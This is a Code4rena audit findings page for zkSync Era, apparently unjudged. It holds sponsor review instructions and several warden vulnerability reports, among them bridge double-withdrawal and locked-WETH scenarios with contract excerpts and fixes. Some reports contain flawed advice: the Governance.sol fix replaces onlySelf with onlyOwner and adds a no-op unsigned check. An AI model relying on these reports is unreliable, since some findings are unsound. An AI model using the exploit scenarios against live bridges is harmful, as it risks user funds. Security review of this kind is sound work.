
2024-03-zksync-findings's Introduction

zkSync Era Audit

Unless otherwise discussed, this repo will be made public after audit completion, sponsor review, judging, and issue mitigation window.

Contributors to this repo: prior to report publication, please review the Agreements & Disclosures issue.


Audit findings are submitted to this repo

Sponsors have three critical tasks in the audit process:

  1. Respond to issues.
  2. Weigh in on severity.
  3. Share your mitigation of findings.

Let's walk through each of these.

High and Medium Risk Issues

Wardens submit issues without seeing each other's submissions, so keep in mind that there will always be findings that are duplicates. For all issues labeled 3 (High Risk) or 2 (Medium Risk), these have been pre-sorted for you so that there is only one primary issue open per unique finding. All duplicates have been labeled duplicate, linked to a primary issue, and closed.

Judges have the ultimate discretion in determining validity and severity of issues, as well as whether/how issues are considered duplicates. However, sponsor input is a significant criterion.

Respond to issues

For each High or Medium risk finding that appears in the dropdown at the top of the chrome extension, please label as one of these:

  • sponsor confirmed, meaning: "Yes, this is a problem and we intend to fix it."
  • sponsor disputed, meaning either: "We cannot duplicate this issue" or "We disagree that this is an issue at all."
  • sponsor acknowledged, meaning: "Yes, technically the issue is correct, but we are not going to resolve it for xyz reasons."

Add any necessary comments explaining your rationale for your evaluation of the issue.

Note that when the repo is public, after all issues are mitigated, wardens will read these comments; they may also be included in your C4 audit report.

Weigh in on severity

If you believe a finding is technically correct but disagree with the listed severity, select the disagree with severity option, along with a comment indicating your reasoning for the judge to review. You may also add questions for the judge in the comments. (Note: even if you disagree with severity, please still choose one of the sponsor confirmed or sponsor acknowledged options as well.)

For a detailed breakdown of severity criteria and how to estimate risk, please refer to the judging criteria in our documentation.

QA reports, Gas reports, and Analyses

All warden submissions in these three categories are submitted as bulk listings of issues and recommendations:

  • QA reports include all low severity and non-critical findings from an individual warden.
  • Gas reports include all gas optimization recommendations from an individual warden.
  • Analyses contain high-level advice and review of the code: the "forest" to individual findings' "trees."

For QA reports, Gas reports, and Analyses, sponsors are not required to weigh in on severity or risk level. We ask that sponsors:

  • Leave a comment for the judge on any reports you consider to be particularly high quality. (These reports will be awarded on a curve.)
  • For QA and Gas reports only: add the sponsor disputed label to any reports that you think should be completely disregarded by the judge, i.e. the report contains no valid findings at all.

Once labelling is complete

When you have finished labelling findings, drop the C4 team a note in your private Discord backroom channel and let us know you've completed the sponsor review process. At this point, we will pass the repo over to the judge to review your feedback while you work on mitigations.

Share your mitigation of findings

Note: this section does not need to be completed in order to finalize judging. You can continue work on mitigations while the judge finalizes their decisions and even beyond that. Ultimately we won't publish the final audit report until you give us the OK.

For each finding you have confirmed, you will want to mitigate the issue before the contest report is made public.

If you are planning a Code4rena mitigation review:

  1. In your own Github repo, create a branch based off of the commit you used for your Code4rena audit, then
  2. Create a separate Pull Request for each High or Medium risk C4 audit finding (e.g. one PR for finding H-01, another for H-02, etc.)
  3. Link the PR to the issue that it resolves within your contest findings repo.

Most C4 mitigation reviews focus exclusively on reviewing mitigations of High and Medium risk findings. Therefore, QA and Gas mitigations should be done in a separate branch. If you want your mitigation review to include QA or Gas-related PRs, please reach out to C4 staff and let’s chat!

If several findings are inextricably related (e.g. two potential exploits of the same underlying issue, etc.), you may create a single PR for the related findings.

If you aren’t planning a mitigation review

  1. Within a repo in your own GitHub organization, create a pull request for each finding.
  2. Link the PR to the issue that it resolves within your contest findings repo.

This will allow for complete transparency in showing the work of mitigating the issues found in the contest. If the issue in question has duplicates, please link to your PR from the open/primary issue.


2024-03-zksync-findings's Issues

Security Vulnerabilities and Access Control Issues in Governance.sol Smart Contract

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/governance/Governance.sol/README.md?plain=1#L249

Vulnerability details

  1. Access Control and Permissions:

Error: The updateDelay and updateSecurityCouncil functions can only be called by the contract itself (onlySelf modifier), which poses a security risk if these functions are not intended strictly for internal use.

Solution: Ensure that only authorized users or contracts can call these functions by implementing proper access control mechanisms. Remove the onlySelf modifier or adjust it to restrict access to authorized users.

function updateDelay(uint256 _newDelay) external onlyOwner {
    emit ChangeMinDelay(minDelay, _newDelay);
    minDelay = _newDelay;
}

function updateSecurityCouncil(address _newSecurityCouncil) external onlyOwner {
    emit ChangeSecurityCouncil(securityCouncil, _newSecurityCouncil);
    securityCouncil = _newSecurityCouncil;
}

  2. Potential Reentrancy Vulnerability:

Error: The _execute function does not have proper error handling for failed external calls, which may lead to reentrancy vulnerabilities if external calls fail unexpectedly.

Solution: Implement proper error handling in the _execute function to revert the transaction if an external call fails. This prevents potential reentrancy attacks. Use the require(success, "External call failed"); statement after each external call to revert the transaction in case of failure.

function _execute(Call[] calldata _calls) internal {
    for (uint256 i = 0; i < _calls.length; ++i) {
        (bool success, bytes memory returnData) = _calls[i].target.call{value: _calls[i].value}(_calls[i].data);
        require(success, "External call failed");
    }
}

  3. Gas-related Vulnerabilities:

Error: The _execute function does not check the gas consumption of external calls, which may lead to out-of-gas errors or vulnerabilities if the gas limit is exceeded.

Solution: Perform gas estimation for external calls in the _execute function to ensure that the gas limit is not exceeded. Consider using the gasleft() function to estimate gas consumption and handle gas-related issues appropriately.

function _execute(Call[] calldata _calls) internal {
    for (uint256 i = 0; i < _calls.length; ++i) {
        // Estimate gas consumption for external calls
        uint256 gasLimit = gasleft() - 5000; // Adjust gas limit as needed
        (bool success, bytes memory returnData) = _calls[i].target.call{value: _calls[i].value, gas: gasLimit}(_calls[i].data);
        require(success, "External call failed");
    }
}

  4. Potential Timestamp Manipulation:

Error: The _schedule function allows operations to be scheduled in the past if _delay is set to a negative value, which may lead to timestamp manipulation vulnerabilities.

Solution: Add a check in the _schedule function to ensure that _delay is a non-negative value to prevent scheduling operations in the past. Use require(_delay >= 0, "Delay must be non-negative"); to enforce this condition.

function _schedule(bytes32 _id, uint256 _delay) internal {
    require(!isOperation(_id), "Operation with this proposal id already exists");
    require(_delay >= 0, "Delay must be non-negative"); // Add this line
    require(_delay >= minDelay, "Proposed delay is less than minimum delay");

    timestamps[_id] = block.timestamp + _delay;
}

Assessed type

Error

QA Report

See the markdown file with the details of this report here.

It's not possible to upgrade chainId

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/StateTransitionManager.sol#L202-L217
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/upgrades/BaseZkSyncUpgrade.sol#L147-L157

Vulnerability details

Impact

Function StateTransitionManager._setChainIdUpgrade(), which is responsible for upgrading the chainId, sets VerifierParams to values that won't be accepted by the BaseZkSyncUpgrade._setVerifierParams() function.
Because of that, upgrading the chainId won't be possible.

Proof of Concept

File: StateTransitionManager.sol

ProposedUpgrade memory proposedUpgrade = ProposedUpgrade({
            l2ProtocolUpgradeTx: l2ProtocolUpgradeTx,
            factoryDeps: bytesEmptyArray,
            bootloaderHash: bytes32(0),
            defaultAccountHash: bytes32(0),
            verifier: address(0),
            verifierParams: VerifierParams({
                recursionNodeLevelVkHash: bytes32(0),
                recursionLeafLevelVkHash: bytes32(0),
                recursionCircuitsSetVksHash: bytes32(0)
            }),
            l1ContractsUpgradeCalldata: new bytes(0),
            postUpgradeCalldata: new bytes(0),
            upgradeTimestamp: 0,
            newProtocolVersion: protocolVersion
        });

As demonstrated above, function StateTransitionManager._setChainIdUpgrade() sets VerifierParams to:

            verifierParams: VerifierParams({
                recursionNodeLevelVkHash: bytes32(0),
                recursionLeafLevelVkHash: bytes32(0),
                recursionCircuitsSetVksHash: bytes32(0)

However, those params won't be accepted by BaseZkSyncUpgrade._setVerifierParams() function.

File: BaseZkSyncUpgrade.sol

		if (
            _newVerifierParams.recursionNodeLevelVkHash == bytes32(0) &&
            _newVerifierParams.recursionLeafLevelVkHash == bytes32(0) &&
            _newVerifierParams.recursionCircuitsSetVksHash == bytes32(0)
        ) {
            return;
        }

        VerifierParams memory oldVerifierParams = s.verifierParams;
        s.verifierParams = _newVerifierParams;
        emit NewVerifierParams(oldVerifierParams, _newVerifierParams);

As demonstrated above, when all three parameters are bytes32(0), function BaseZkSyncUpgrade._setVerifierParams() returns early instead of continuing execution and updating VerifierParams.

The flow can be summarized as below:

  1. StateTransitionManager._setChainIdUpgrade() sets recursionNodeLevelVkHash, recursionLeafLevelVkHash, recursionCircuitsSetVksHash to bytes32(0).
  2. BaseZkSyncUpgrade._setVerifierParams() - lines 147-153: _newVerifierParams.recursionNodeLevelVkHash == bytes32(0) && _newVerifierParams.recursionLeafLevelVkHash == bytes32(0) && _newVerifierParams.recursionCircuitsSetVksHash == bytes32(0) condition is fulfilled, thus function returns, instead of upgrading VerifierParams.

This leads to the conclusion that it's not possible to upgrade the chainId, because StateTransitionManager._setChainIdUpgrade() sets VerifierParams to bytes32(0), and according to BaseZkSyncUpgrade._setVerifierParams(), those parameters cannot be empty.
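The early-return gate described above can be modeled with a small Python sketch (the function and state names are illustrative stand-ins for the Solidity code, not the contract itself):

```python
# Hypothetical model of the BaseZkSyncUpgrade._setVerifierParams() gate.
ZERO = b"\x00" * 32  # stand-in for bytes32(0)

def set_verifier_params(state: dict, node_vk: bytes, leaf_vk: bytes, circuits_vk: bytes) -> bool:
    """Mirrors the all-zero early return: params are only stored when at
    least one of them is non-zero. Returns True if state was updated."""
    if node_vk == ZERO and leaf_vk == ZERO and circuits_vk == ZERO:
        return False  # early return: VerifierParams left unchanged
    state["verifier_params"] = (node_vk, leaf_vk, circuits_vk)
    return True

# The chainId-upgrade path supplies all-zero params, so nothing is stored:
state = {"verifier_params": None}
assert set_verifier_params(state, ZERO, ZERO, ZERO) is False
assert state["verifier_params"] is None
```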

Tools Used

Manual code review

Recommended Mitigation Steps

When calling StateTransitionManager._setChainIdUpgrade(), make sure that the VerifierParams fields (recursionNodeLevelVkHash, recursionLeafLevelVkHash, recursionCircuitsSetVksHash) are not empty, and set them to values accepted by BaseZkSyncUpgrade._setVerifierParams().

Assessed type

Invalid Validation

QA Report

See the markdown file with the details of this report here.

User might be able to double withdraw during migration

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L421-L427
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L375

Vulnerability details

Impact

A user might be able to double withdraw during migration under some edge conditions: (1) their withdrawal tx is included in a batch whose number is equal to or greater than eraFirstPostUpgradeBatch; and (2) the user calls finalizeWithdrawal on the old L1ERC20Bridge.sol before L1ERC20Bridge.sol is upgraded.

Proof of Concept

The current migration process takes place in steps, which might allow edge conditions to occur. Step A: deploy new contracts (including L1SharedBridge). Step B: Era upgrade and L2 system contracts upgrade (at this point the old L1ERC20Bridge still works). Step C: upgrade the L2 bridge and L1ERC20Bridge.sol, then migrate funds to the new L1SharedBridge.

Since L1ERC20Bridge.sol is upgraded at the end, an edge condition can occur between Step A and Step B, where a user can still withdraw ERC20 tokens on the old L1ERC20Bridge.sol.

Scenario: If a user calls finalizeWithdrawal for ERC20 tokens on the old L1ERC20Bridge.sol first, they can withdraw again on L1SharedBridge.sol as long as the _l2BatchNumber of the withdrawal tx is equal to or greater than eraFirstPostUpgradeBatch. In other words, the _isEraLegacyWithdrawal check can be invalidated.

  1. Step A: L1SharedBridge.sol is deployed and initialized with a pre-determined eraFirstPostUpgradeBatch value;
  2. UserA initiates an ERC20 withdrawal tx on the L2 bridge (currently the old version);
  3. Step B: the Era upgrade is performed. UserA's withdrawal tx is included in the batch numbered eraFirstPostUpgradeBatch;
  4. UserA calls finalizeWithdrawal on the old L1ERC20Bridge.sol. UserA receives funds, because funds haven't been migrated yet;
  5. Step C: the new L1ERC20Bridge.sol is deployed and funds (ERC20) are migrated to L1SharedBridge.sol;
  6. UserA calls finalizeWithdrawal on L1SharedBridge.sol. This time, the _isEraLegacyWithdrawal(_chainId, _l2BatchNumber) check is bypassed, because the user's _l2BatchNumber == eraFirstPostUpgradeBatch; UserA receives the withdrawal funds a second time.
//code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol
    function finalizeWithdrawal(
        uint256 _chainId,
        uint256 _l2BatchNumber,
        uint256 _l2MessageIndex,
        uint16 _l2TxNumberInBatch,
        bytes calldata _message,
        bytes32[] calldata _merkleProof
    ) external override {
       //@audit-info when _l2BatchNumber>= eraFirstPostUpgradeBatch, `_isEraLegacyWithdrawal()` return false, checking on withdrawal status on legacyERC20bridge will be bypassed.
|>     if (_isEraLegacyWithdrawal(_chainId, _l2BatchNumber)) {
            require(
                !legacyBridge.isWithdrawalFinalized(
                    _l2BatchNumber,
                    _l2MessageIndex
                ),
                "ShB: legacy withdrawal"
            );
        }
        _finalizeWithdrawal(
            _chainId,
            _l2BatchNumber,
            _l2MessageIndex,
            _l2TxNumberInBatch,
            _message,
            _merkleProof
        );
}

(https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L421-L427)

//code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol
    function _isEraLegacyWithdrawal(
        uint256 _chainId,
        uint256 _l2BatchNumber
    ) internal view returns (bool) {
        return
            (_chainId == ERA_CHAIN_ID) &&
|>          (_l2BatchNumber < eraFirstPostUpgradeBatch); //@audit-info note:when _l2BatchNumber>= eraFirstPostUpgradeBatch, `_isEraLegacyWithdrawal()` return false.
    }

(https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L375)
As seen, the withdrawal status on the legacy ERC20 bridge is only checked when _isEraLegacyWithdrawal returns true. But because the _l2BatchNumber of a withdrawal tx during the upgrade can be equal to or greater than the predefined eraFirstPostUpgradeBatch, the _isEraLegacyWithdrawal check can rest on false assumptions about _l2BatchNumber and eraFirstPostUpgradeBatch, allowing double withdrawal in edge cases.
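The boundary condition above can be sketched in Python; the chain ID and batch numbers are made-up illustration values, not values from the audited deployment:

```python
# Minimal model of the `_isEraLegacyWithdrawal()` strict-less-than boundary.
ERA_CHAIN_ID = 324                     # illustrative
ERA_FIRST_POST_UPGRADE_BATCH = 1000    # illustrative

def is_era_legacy_withdrawal(chain_id: int, l2_batch_number: int) -> bool:
    # Strict `<`: a withdrawal included exactly at the upgrade batch is
    # already treated as post-upgrade, so the legacy-finalized check is skipped.
    return chain_id == ERA_CHAIN_ID and l2_batch_number < ERA_FIRST_POST_UPGRADE_BATCH

# Batch before the upgrade: legacy check runs.
assert is_era_legacy_withdrawal(ERA_CHAIN_ID, 999) is True
# Batch equal to eraFirstPostUpgradeBatch: legacy check is bypassed --
# the edge case the scenario above exploits.
assert is_era_legacy_withdrawal(ERA_CHAIN_ID, 1000) is False
```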

Tools Used

Manual

Recommended Mitigation Steps

Consider adding a grace period during and following an upgrade, during which time legacyWithdrawal status will always be checked.

Assessed type

Other

User might not be able to withdraw WETH/ETH on L1 with legacy l2Batchnumber, resulting in ETH permanently locked in L1SharedBridge.sol

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L443-L447

Vulnerability details

Impact

A user might not be able to withdraw WETH/ETH on L1 with legacy l2Batchnumber, resulting in ETH permanently locked in L1SharedBridge.sol.

The new Mailbox is not always backward compatible.

Proof of Concept

The new Mailbox and L1SharedBridge are intended to be backward compatible. But the current implementation of the withdrawal flow in Mailbox.sol and L1SharedBridge.sol might cause certain legacy WETH deposits to be locked when withdrawn.

Suppose a user deposited WETH before the upgrade through the old L1WETHBridge.sol.
Now the user initiates a withdrawal of WETH from the old L2WETHBridge.sol before the Era upgrade.

(1) Since the upgrade hasn't started or is about to start, the user would still interact with the old L2WETHBridge.sol withdraw(), which burns the user's L2 WETH for ETH and sends an ETH withdrawal through L2_ETH_ADDRESS.withdrawWithMessage{value: _amount}(l1Bridge, wethMessage);. Note that this sets l1Bridge (the old L1WETHBridge.sol) as the L1 receiver. The user-designated _l1Receiver is part of wethMessage.

//L2WethBridge.sol (legacy, for reference only)
    function withdraw(
        address _l1Receiver,
        address _l2Token,
        uint256 _amount
    ) external override {
...
        // WETH withdrawal message.
        bytes memory wethMessage = abi.encodePacked(_l1Receiver);

        // Withdraw ETH to L1 bridge.
        //@audit-info note: the legacy L2WethBridge will put the L1WethBridge address as l1Receiver. The actual user address (`_l1Receiver`) will be encoded in the message.
|>       L2_ETH_ADDRESS.withdrawWithMessage{value: _amount}(l1Bridge, wethMessage);

(2) Now if the L1 Era upgrade hasn't started yet, the user will still call L1WethBridge.sol's finalizeWithdrawal() to withdraw WETH. However, if the L1 Era upgrade settles first, before the user's finalizeWithdrawal() call, L1WethBridge.sol's finalizeWithdrawal() tx will call the new Mailbox's finalizeEthWithdrawal() function.

The problem occurs here: although the new Mailbox.sol retains finalizeEthWithdrawal(), it won't be backward compatible with the legacy WETH withdrawal flow.

The new finalizeEthWithdrawal() will call L1SharedBridge's finalizeWithdrawal(). L1SharedBridge will send ETH to l1Receiver (the L1WethBridge address, not the user's address). However, the ETH transfer will revert, because L1WethBridge.sol will not recognize L1SharedBridge.sol's address and will revert in its receive() fallback.

//code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol
    function finalizeEthWithdrawal(
        uint256 _l2BatchNumber,
        uint256 _l2MessageIndex,
        uint16 _l2TxNumberInBatch,
        bytes calldata _message,
        bytes32[] calldata _merkleProof
    ) external nonReentrant {
...
          //@audit-info note: in a legacy Weth withdrawal flow, new Mailbox will pass control flow to L1SharedBridge
|>        IL1SharedBridge(s.baseTokenBridge).finalizeWithdrawal(
            ERA_CHAIN_ID,
            _l2BatchNumber,
            _l2MessageIndex,
            _l2TxNumberInBatch,
            _message,
            _merkleProof
        );

(https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol#L186)

//code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol
    function _finalizeWithdrawal(
        uint256 _chainId,
        uint256 _l2BatchNumber,
        uint256 _l2MessageIndex,
        uint16 _l2TxNumberInBatch,
        bytes calldata _message,
        bytes32[] calldata _merkleProof
    )
...
          //@audit-info note: when a user finalizes a legacy WETH withdrawal, this l1Receiver will be the legacy L1WethBridge address, not the actual user withdrawal receiver
|>        (l1Receiver, l1Token, amount) = _checkWithdrawal(_chainId, messageParams, _message, _merkleProof);
...
        if (l1Token == ETH_TOKEN_ADDRESS) {
            bool callSuccess;
            // Low-level assembly call, to avoid any memory copying (save gas)
            assembly {
                  //@audit-info note: when a user finalizes a legacy WETH withdrawal, this ETH transfer will revert in the L1WethBridge.sol receive fallback.
|>                callSuccess := call(gas(), l1Receiver, amount, 0, 0, 0, 0)
            }

(https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L443-L447)

//L1WethBridge.sol (legacy, for reference only)
    receive() external payable {
        // Expected to receive ether in two cases:
        // 1. l1 WETH sends ether on `withdraw`
        // 2. zkSync contract withdraw funds in `finalizeEthWithdrawal`
          //@audit-info note: a legacy Weth finalize withdrawal will revert, because msg.sender will now be L1SharedBridge.sol
 |>       require(msg.sender == l1WethAddress || msg.sender == address(zkSync), "pn");
        emit EthReceived(msg.value);
    }

Note: if the user calls finalizeEthWithdrawal() directly on the new Mailbox.sol, it will also revert for the same reason as above.

Because the old L2WethBridge.sol encodes L1WethBridge.sol as the l1Receiver, any attempt at a WETH withdrawal on L2 close to or during the Era upgrade might result in ETH permanently locked in L1SharedBridge.sol. Users will lose funds.
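The sender gate that causes the revert can be modeled as follows; the addresses are placeholder strings, not real contract addresses:

```python
# Hypothetical model of the sender check in the legacy L1WethBridge receive() fallback.
L1_WETH_ADDRESS = "0xWETH"
ZKSYNC_DIAMOND = "0xZkSyncDiamond"
L1_SHARED_BRIDGE = "0xSharedBridge"

def l1_weth_bridge_receive(msg_sender: str) -> None:
    # Mirrors: require(msg.sender == l1WethAddress || msg.sender == address(zkSync), "pn");
    if msg_sender not in (L1_WETH_ADDRESS, ZKSYNC_DIAMOND):
        raise RuntimeError("pn")  # revert: unexpected ETH sender

# The pre-upgrade senders are accepted...
l1_weth_bridge_receive(ZKSYNC_DIAMOND)
# ...but the new L1SharedBridge is not, so the legacy-flow ETH transfer reverts:
try:
    l1_weth_bridge_receive(L1_SHARED_BRIDGE)
    raise AssertionError("expected revert")
except RuntimeError as e:
    assert str(e) == "pn"
```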

Tools Used

Manual

Recommended Mitigation Steps

Since the new Mailbox is intended to be backward compatible and there will be in-flight legacy WETH withdrawal txs, it must be ensured that users' legacy WETH withdrawals do not lock funds in L1SharedBridge.

Consider refactoring Mailbox's finalizeEthWithdrawal() to be compatible with the legacy Weth withdrawal flow.

Assessed type

Other

msg.sender has to be un-aliased in L1ERC20Bridge.tranferTokenToSharedBridge()

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1ERC20Bridge.sol#L64

Vulnerability details

Impact

Users who deposit tokens in L1ERC20Bridge will not receive them on the shared bridge, because the check require(msg.sender == address(sharedBridge)) will always revert.

Vulnerability details

L1ERC20Bridge.tranferTokenToSharedBridge() checks that msg.sender is sharedBridge:

require(msg.sender == address(sharedBridge), "Not shared bridge"); 

However, since the function is called in an L1ERC20Bridge - sharedBridge transaction initiated by sharedBridge, which is a contract, msg.sender will actually be the aliased address of sharedBridge, while sharedBridge is the un-aliased address of the bridge. As such, this check will always revert, and users who deposit tokens in L1ERC20Bridge will not receive them on the shared bridge.
L1ERC20Bridge.sol#L64

function tranferTokenToSharedBridge(address _token, uint256 _amount) external {
@>  require(msg.sender == address(sharedBridge), "Not shared bridge");
    uint256 amount = IERC20(_token).balanceOf(address(this));
    require(amount == _amount, "Incorrect amount");
    IERC20(_token).safeTransfer(address(sharedBridge), amount);
}

The vulnerability is similar to spearbit-blast-report-1, where the check require(msg.sender == address(OTHER_BRIDGE), ""); would always revert, as msg.sender would be the aliased address of L1BlastBridge while OTHER_BRIDGE is the un-aliased address of L1BlastBridge.

Tools Used

Manual Review

Recommended Mitigation Steps

Un-alias msg.sender in the check as such:

- require(msg.sender == address(sharedBridge), "Not shared bridge");
+ require(AddressAliasHelper.undoL1ToL2Alias(msg.sender) == address(sharedBridge), "Not shared bridge");
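The aliasing round-trip that the proposed fix relies on can be sketched in Python. The offset constant follows the convention commonly used by AddressAliasHelper-style libraries; treat this as an illustrative model rather than the audited code:

```python
# Model of L1->L2 address aliasing and its inverse (AddressAliasHelper-style).
ALIAS_OFFSET = 0x1111000000000000000000000000000000001111
ADDR_MASK = (1 << 160) - 1  # addresses are 160-bit

def apply_l1_to_l2_alias(addr: int) -> int:
    # addr + offset, modulo 2^160
    return (addr + ALIAS_OFFSET) & ADDR_MASK

def undo_l1_to_l2_alias(aliased: int) -> int:
    # inverse: aliased - offset, modulo 2^160
    return (aliased - ALIAS_OFFSET) & ADDR_MASK

shared_bridge = 0xABCDEF  # placeholder address
aliased = apply_l1_to_l2_alias(shared_bridge)
# The raw msg.sender would fail a direct equality check...
assert aliased != shared_bridge
# ...but un-aliasing recovers the original address, as the fix proposes:
assert undo_l1_to_l2_alias(aliased) == shared_bridge
```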

Assessed type

Error

Agreements & Disclosures

Agreements

If you are a C4 Certified Contributor, by commenting or interacting with this repo prior to public release of the contest report you agree that you have read the Certified Warden docs and agree to be bound by:

To signal your agreement to these terms, add a 👍 emoji to this issue.

Code4rena staff reserves the right to disqualify anyone from this role and similar future opportunities who is unable to participate within the above guidelines.

Disclosures

Sponsors may elect to add team members and contractors to assist in sponsor review and triage. All sponsor representatives added to the repo should comment on this issue to identify themselves.

To ensure contest integrity, the following potential conflicts of interest should also be disclosed with a comment in this issue:

  1. any sponsor staff or sponsor contractors who are also participating as wardens
  2. any wardens hired to assist with sponsor review (and thus presenting sponsor viewpoint on findings)
  3. any wardens who have a relationship with a judge that would typically fall in the category of potential conflict of interest (family, employer, business partner, etc)
  4. any other case where someone might reasonably infer a possible conflict of interest.

Facet Position is not Deleted after Deleting Facet

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/libraries/Diamond.sol#L261-L273

Vulnerability details

Impact

Wrong implementation and a data-access risk, as the facet position is not deleted after the facet is removed in the Diamond.sol contract.

Proof of Concept

 function _removeFacet(address _facet) private {
        DiamondStorage storage ds = getDiamondStorage();

        // Get index of `DiamondStorage.facets` of the facet and last element of array
>>>        uint256 facetPosition = ds.facetToSelectors[_facet].facetPosition;
>>>        uint256 lastFacetPosition = ds.facets.length - 1;

        // If the facet is not at the end of the array then move the last element to the facet position
        if (facetPosition != lastFacetPosition) {
            address lastFacet = ds.facets[lastFacetPosition];

            ds.facets[facetPosition] = lastFacet;
            ds.facetToSelectors[lastFacet].facetPosition = facetPosition.toUint16();
        }

        // Remove last element from the facets array
>>>        ds.facets.pop();
    }

Without going into complex details, the function above shows how a facet is removed from the Diamond contract. The problem is that only the facet is popped from the array; the position the facet held is not deleted from storage. This causes a situation where different facets hold the same position in the contract. The significance of this oversight can be seen in how selector removal is handled at L247: deleting the position is as important as deleting the facet itself.
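The swap-and-pop removal and the stale mapping entry it leaves behind can be reproduced with a small Python model (a list stands in for ds.facets and a dict for the facetPosition mapping; names are illustrative):

```python
# Model of the swap-and-pop _removeFacet() logic described above.
def remove_facet(facets: list, facet_position: dict, facet: str) -> None:
    pos = facet_position[facet]
    last = len(facets) - 1
    # If the facet is not at the end of the array, move the last element into its slot.
    if pos != last:
        last_facet = facets[last]
        facets[pos] = last_facet
        facet_position[last_facet] = pos
    facets.pop()
    # NOTE: mirroring the reported issue, facet_position[facet] is NOT
    # deleted, so the removed facet keeps a (now stale) position entry.

facets = ["A", "B", "C"]
positions = {"A": 0, "B": 1, "C": 2}
remove_facet(facets, positions, "B")
assert facets == ["A", "C"]
assert positions["C"] == 1
# Stale entry survives: "B" still claims position 1, the same slot as "C".
assert positions["B"] == 1
```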

Tools Used

Manual Review

Recommended Mitigation Steps

The protocol should consider resetting the facet position to type(uint16).max to represent the fact that it has been deleted, or simply delete the facet entry from storage in the same pattern used for selectors at L247, as provided below:

 function _removeFacet(address _facet) private {
        DiamondStorage storage ds = getDiamondStorage();

        // Get index of `DiamondStorage.facets` of the facet and last element of array
        uint256 facetPosition = ds.facetToSelectors[_facet].facetPosition;
        uint256 lastFacetPosition = ds.facets.length - 1;

        // If the facet is not at the end of the array then move the last element to the facet position
        if (facetPosition != lastFacetPosition) {
            address lastFacet = ds.facets[lastFacetPosition];

            ds.facets[facetPosition] = lastFacet;
            ds.facetToSelectors[lastFacet].facetPosition = facetPosition.toUint16();
        }

        // Remove last element from the facets array
        ds.facets.pop();
+++   delete ds.facetToSelectors[_facet]; 
    }

Assessed type

Access Control

`getCanonicalL1TxHash()` may return the same hash for different transactions

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/bootloader/bootloader.yul#L692-L707

Vulnerability details

Impact

Function getCanonicalL1TxHash() returns the canonical hash of an L1->L2 transaction, which will be sent to L1 as a message to the L1 contract confirming that a certain operation has been processed.

Since it accepts just a txDataOffset, two different transactions with the same offset will return the same hash.

Proof of Concept

File: bootloader.yul

/// @dev Calculates the canonical hash of the L1->L2 transaction that will be
            /// sent to L1 as a message to the L1 contract that a certain operation has been processed.
            function getCanonicalL1TxHash(txDataOffset) -> ret {
                // Putting the correct value at the `txDataOffset` just in case, since 
                // the correctness of this value is not part of the system invariants.
                // Note, that the correct ABI encoding of the Transaction structure starts with 0x20
                mstore(txDataOffset, 32)

                let innerTxDataOffset := add(txDataOffset, 32)
                let dataLength := safeAdd(32, getDataLength(innerTxDataOffset), "qev")

                debugLog("HASH_OFFSET", innerTxDataOffset)
                debugLog("DATA_LENGTH", dataLength)

                ret := keccak256(txDataOffset, dataLength)
            }

Let's consider two different L1->L2 transactions with the same offset. Since the offset is the same for both, the txDataOffset parameter of getCanonicalL1TxHash() will be the same. This leads to the conclusion that getCanonicalL1TxHash() will return the same hash for two different transactions when their offsets are the same.
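The shape of the hashing described above can be sketched in Python. Here sha3_256 stands in for the EVM's keccak256 (a different algorithm, but the point is the same): only the bytes in [txDataOffset, txDataOffset + dataLength) enter the hash, and nothing else (such as a nonce) distinguishes the inputs:

```python
import hashlib

def canonical_l1_tx_hash(memory: bytes, tx_data_offset: int, data_length: int) -> bytes:
    # Hash is computed solely over the memory slice at the given offset,
    # mirroring keccak256(txDataOffset, dataLength) in the Yul code.
    return hashlib.sha3_256(memory[tx_data_offset:tx_data_offset + data_length]).digest()

mem = bytes(64) + b"tx-payload" + bytes(22)
# Two calls with the same offset over identical memory contents
# necessarily collide, since no extra distinguishing input enters the hash:
h1 = canonical_l1_tx_hash(mem, 64, 10)
h2 = canonical_l1_tx_hash(mem, 64, 10)
assert h1 == h2
```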

Tools Used

Manual code review

Recommended Mitigation Steps

Refactor getCanonicalL1TxHash() so that it takes an additional parameter, nonce, which is also used in the hash calculation. Adding this parameter ensures that getCanonicalL1TxHash() returns different hashes even for transactions with the same txDataOffset.

Assessed type

Other

Chain Cannot be Unfrozen after Freezing by State Transition Manager

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/StateTransitionManager.sol#L165
